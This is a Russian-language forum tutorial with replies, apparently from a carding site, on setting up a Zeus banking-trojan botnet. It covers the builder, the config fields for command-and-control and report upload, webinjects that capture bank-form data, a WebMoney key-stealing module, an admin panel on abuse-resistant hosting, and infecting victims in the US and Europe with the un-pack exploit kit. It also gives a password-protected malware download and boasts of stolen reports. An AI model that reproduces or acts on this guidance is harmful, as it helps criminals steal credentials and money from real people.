Ботнет на базе Zeus 1.2.7.19+FF

Статья написана для 1.3.1.1 вконце топа я выкладываю более актуальную версию 1.2.7.19+FF

Как видно из названия статейки речь сегодня пойдет о создании собственного ботнета. Что такое ботнет я объяснять не буду так как об этом говорилось уже и не раз и не два. И так приступим

Введение

И так нам нужен билдер бота, в нашем случае это Zeus bild 1.3.1.1

как видно мы используем фейк от "b1sh0p" который был скомпилирован
"Build time: 1917 23.08.2009 GMT" эту информацию мы видим в меню "Information" но нам нужно меню "Builder"

и так тут мы видим пусть до билдера, и 3 кнопки с помошью которого мы и будим создавать нашего бота!!!!

Немного о строении билдера:

давайте ка я вам поясню что у нас тут что:

1. server

PHP:

 1277 - это админ панель которая ставиться на хост... о ней м поговорим позднее.
2. cfg1.bin - это резервный конфиг фаил который должен лежать на 2(резрвном абузоустойчивом сервере)
3. config.bin - наш основной конфиг который мы скоро будим генерить под свой хост.
4. config.txt - это и есть наш фаил настройки в котором мы будим прописывать все настройки бота, и в дальнейшем компилить билд.
5. webinjects.txt - это 1 из самых важных фаилов... Это зборка инжектов(грубо говоря инстукция какие поля и какие лини грабить)
6. modul.exe - это вебмани модуль который ворует серты ключики ну и всю лабуду связаную с вебмани(По ру не работайте не срите там где живете!)
7. zsb.exe - это наш билдер с помошью которого мы и будим настраивать бота!

И так приступим!!!!!
и так нажимаем кнопочку "Edit сonfig" мы видим:
[IMG]http://img23.imageshack.us/img23/5977/33049709.jpg[/IMG]
что открылся фаил "config.txt" который нам нужно отредактировать под свои нужны.

Раскажу в кратце что тут у нас и как:
(нужныем нам поля в фаиле config.txt)

url_config "[URL='http://Твой_сайт/config.bin']http://Твой_сайт/config.bin"[/URL] - фаил конфига чтобы к которым боты конектяться и получают инфу о изменении(например если ты переехал на другой абузоустойчивый сервер)
url_compip "[URL='http://Твой_сайт/cp.php']http://Твой_сайт/cp.php"[/URL] 1024 - Эта главная страница нашей админки по этому линку мы будим конектиться и логиниться к админ панели.

url_loader "[URL='http://Твой_сайт/bot.exe']http://Твой_сайт/bot.exe"[/URL] - это наш бот нужен он тут для того чтобы наши боты всегда были актуальны.
url_server "[URL='http://Твой_сайт/gate.php']http://Твой_сайт/gate.php"[/URL] - это тот скрипт который принимает отчеты от наших ботов.


encryption_key "sys_admin" - это ключик чтобы расшифровать то что нам прислали наши боты.

Ну вроде все больше нам тут нечего не нужно.

закрываем фаил config.txt с сохранением. ....

А вот нет кнопочку "Buil config" мы не жмем... нам нужен грамотный webinjects.txt который можно написать самому или купить у барыг на форумах!

выглядит он примерно так:
[IMG]http://img707.imageshack.us/img707/2776/67251137.jpg[/IMG]
И так когда мы заполучили грамотный webinjects.txt то можем жать кнопочку "Buil config" и получим на выходе:
[IMG]http://img684.imageshack.us/img684/286/79887884.jpg[/IMG]
как раз таки необходимый нам "config.bin". Сохраняем его и идем дальше...

А дальше у нас кнопочка "Build loader" нажав на неё мы получим нашего бота который будит настроен на наш шайт и который будит брать настройки с "config.bin"... Выглядит это так:
[IMG]http://img14.imageshack.us/img14/4144/46434731.jpg[/IMG]
и так у нас теперь есть вирус и фаил для его полноценной работы...
подготовку мы закончили перейдем к основной части нашего замысла.

ЗЫ. не смотрите на мою свалку файлов в папке с билдером зевса... просто мне так удобней когда все под рукой))) все необходимые файлы я указал выше и дал описание к ним...


Установка админ панели

Админ панель нам нужно ставить на абузоустойчивый сервер чтобы если нашего бота спалят хостер не снес нашу админку и наши отчеты... Выбор абузы лежит полностью на ваших пелчах.)))

фаилы нашей админ панели лежат в моем случае в папочке "server[php] 1277" и находиться там:
[IMG]http://img42.imageshack.us/img42/9550/61292988.jpg[/IMG]
и да хочу добавить что эту админ панель я модифицировал под себя...
в стандартной админке к билдеру 1.3.1.1 небыло фаила s.php(но в фаиле redir.php есть указание что этот фаил нам не обходим) так же в директории system я добавил фаил fmt.php так как в фаиле s.php есть указание на этот файл(фаил s.php и fmt.php я взял из старой версии админ панели)... (Возможно эта модификация была лишней но почиму то боты мне не слали отчеты пока я не добавил эти файлы о_0)

И так выяснив из чего состоит админ панель нам надо её установить на наш абузоустойчивый сервер... залив все файлы на фтп(заливать нужно строго по тому линку который указали в config.txt например если ты залил [URL]http://Твой_сайт/AAAAAA/cp.php[/URL] а в конфиге указал [URL]http://Твой_сайт/AAAAA/config.bin[/URL] то отчеты до тебя уже не дойдут!!!! БУДЬ ВНИМАТЕЛЕН) и так залив все фаилы на сервер идем по линку [URL]http://Твой_сайт/install/index.php[/URL] прописываем все данные такие как логин и пароль до админки и данные для конекта к базе данных... и так же не забываем указать правильный Encryption key: в нашем случае это sys_admin. Так же ставим флаги на Write reports to database и на Write reports to local path. это даст нам то что наши отчеты будут сохраняться как в базу так и в фаил...

И так если все установилось(а если все установилось то вы это увидите сами) при обрашении к [URL]http://Твой_сайт/cp.php[/URL] мы увидим:


И так вводим логин и пароль указаный при установки админ панели и вуаля вы в админ панели...!!!!


ЗЫ. СЛЕДИТЕ ЗА ПРАВИЛЬНОСТЬЮ НАПИСАНИЯ ЛИНКОВ!!! ЭТО ЗАЛОГ УСПЕХА!!!!!
ЗЫЫ. Да кстати фаилы bot.exe и config.bin нам тоже надо залить на сервер.


Связка...

И так мы собрали бота и установили админ панель... возникает вопрос а что же нам делать дальше.... А дальше нам надо нашего бота впарить какомунибудь дятлу желательно в америке или европе чтобы получить вкусных линкво)) и для этого мы будим использовать Связку эксплоитов... для этой статейки я выбрал более мение нормальную связку под названием un-pack версии 1.5 выглядит эта перелсть так:
[IMG]http://img697.imageshack.us/img697/7974/82243543.jpg[/IMG]
как видно на скриншоте я прогрузил немного трафика и даже без перетяски связки она дает какойто пробив о_0 меня самого это удивило когда я тестил связки но для новичков самое то!
И так что тут да как расказывать лень да и хелп там хороший есть... идинственный прикол в том что нужно найти фтп и проифреймить их... об этом я раскажу в другой статейки(в разработке обзор паблик связок создание из паблик связок своей полу приват связки и прогрузка трафика и крипт как exe так самой связки(для данной статейки я грузил не криптованые exe для более наглядной димонстрации))

и так мы видим что прогрузилось 4 уника и в админ панели мы видим:
[IMG]http://img697.imageshack.us/img697/3639/18672238.jpg[/IMG]
ну вот что то прогузилось и вот они отчеты за 10 дней(покаюсь там было ешё 1к отчетов я их удалил так как бота закосячил командами и он спалил что он протроянен и сменил все пароли...)

Ну вот вроде бы и все... Статейка орейнтирована на новечков и имеит пару косяков (СДЕЛАНО СПЕЦИАЛЬНО ЧТОБЫ ВЫ УЧИЛИСЬ А НЕ СИДЕЛИ НА ВСЕМ ГОТОВОМ!)


ЗЫ. Выбирайте норм связку и криптуйте EXE тогда успех вам гарантирован!!!!


Заключение...

И так мы сегодня расмотрели как создать свой ботнет... как видите нечего тут сложного нету... НО вы столкнетесь с подводными течениями в которых вам придеться разбираться самим...

Всем удачных экмперементов и хорошего прогруза!

© BuBliK

Zeus 1.2.7.19+FF
hXXp://www.sendspace.com/file/0s97o7
pass: csu
[COLOR=#FFFFFF]__________________
© crdsu.su[/COLOR]

Перезелейте!

дел

Перезалей некоторые скрины

Перезалейте!

Это просто..... писец!!! Как так то?

ТС, юзерки пищат о перезаливе.
Повременить решил? :huh:/>

на данный момент актуально?

Модуль b1sh0p стар как мир.
Если уж зевс приглянулся то берите Zeus 2.9.6.1 он в паблик вылетел в Январе, с Сентября была 2.6.9.1 приватная версия.

Статья старая ..http://crdpro.su/archive/index.php/t-32640.html